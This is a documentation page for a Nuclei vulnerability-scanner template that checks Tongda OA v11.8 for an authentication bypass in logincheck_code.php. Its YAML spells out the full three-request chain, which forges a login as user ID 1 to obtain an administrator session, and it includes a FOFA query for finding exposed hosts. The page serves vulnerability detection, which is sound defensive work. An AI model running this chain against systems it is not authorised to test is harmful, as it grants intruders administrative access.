Skip to content
Nuclei Templates

Tongda OA v11.8 logincheck_code.php - Authentication Bypass

ID: tongda-login-code-authbypass

Severity: high

Author: SleepingBag945

Tags: tongda,authbypass

Description

Section titled “Description”

There is a login bypass vulnerability in Tongda OA v11.8 logincheck_code.php, through which an attacker can log in to the system administrator background

YAML Source

Section titled “YAML Source”
id: tongda-login-code-authbypass


info:
  name: Tongda OA v11.8 logincheck_code.php - Authentication Bypass
  author: SleepingBag945
  severity: high
  description: |
    There is a login bypass vulnerability in Tongda OA v11.8 logincheck_code.php, through which an attacker can log in to the system administrator background
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E9%80%9A%E8%BE%BEOA%20v11.5%20logincheck_code.php%20%E7%99%BB%E9%99%86%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 3
    fofa-query: app="TDXK-通达OA"
  tags: tongda,authbypass


http:
  - raw:
      - |
        GET /general/login_code.php HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /logincheck_code.php HTTP/1.1
        Host: {{Hostname}}


        CODEUID={{uid}}&UID=1
      - |
        GET /general/index.php?isIE=0&modify_pwd=0 HTTP/1.1
        Host: {{Hostname}}
        Cookie: PHPSESSID={{cookie}};


    extractors:
      - type: regex
        name: uid
        internal: true
        group: 1
        regex:
          - '"code_uid":"(.*?)"'


      - type: regex
        name: cookie
        internal: true
        part: header
        group: 1
        regex:
          - 'PHPSESSID=(.*?);'
    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200 && contains(body_1, "\"code_uid\":\"{") && contains(body_1,"\"status\":1")'
          - 'status_code_2 == 200 && contains(body_2,"index.php?isIE")'
          - 'status_code_2 == 200 && contains(header_2,"Set-Cookie")'
          - 'status_code_3 == 200 && !contains(body_3,"<title>用户未登录</title>")  && contains(body_3,"loginUser")'
        condition: and
# digest: 4b0a00483046022100af82a27cca25df84431682fe7a5b75b57b52fc3cafccb62d8bc00d8b802b8b6d022100d37d04ee0999a36bf0579c8263411e1c04ff468049a2ca129f3d69b816b2f612:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/tongda/tongda-login-code-authbypass.yaml"

View on Github